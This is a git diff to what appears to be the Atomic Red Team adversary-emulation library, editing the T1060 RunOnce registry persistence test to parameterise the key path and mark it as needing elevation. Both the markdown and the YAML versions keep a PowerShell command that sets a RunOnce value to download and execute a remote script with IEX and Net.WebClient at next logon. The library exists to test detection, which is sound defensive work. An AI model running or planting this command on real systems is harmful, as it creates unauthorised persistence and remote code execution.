diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md
index a987a698..2bd52117 100644
--- a/atomics/T1060/T1060.md
+++ b/atomics/T1060/T1060.md
@@ -114,17 +114,18 @@ RunOnce Key Persistence via PowerShell
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | thing_to_execute | Thing to Run | Path | powershell.exe|
+| reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce|
 
 
-#### Attack Commands: Run with `powershell`! 
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
 ```
-$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+$RunOnceKey = "#{reg_key_path}"
 set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
 ```
 
 #### Cleanup Commands:
 ```
-Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore
+Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
 ```
 
 
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 45048ccd..175a21dc 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -3785,13 +3785,18 @@ persistence:
           description: Thing to Run
           type: Path
           default: powershell.exe
+        reg_key_path:
+          description: Path to registry key to update
+          type: Path
+          default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce
       executor:
         name: powershell
+        elevation_required: true
         command: |
-          $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+          $RunOnceKey = "#{reg_key_path}"
           set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
-        cleanup_command: 'Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
-          -ErrorAction Ignore
+        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
+          -Force -ErrorAction Ignore
 
 '
   T1053: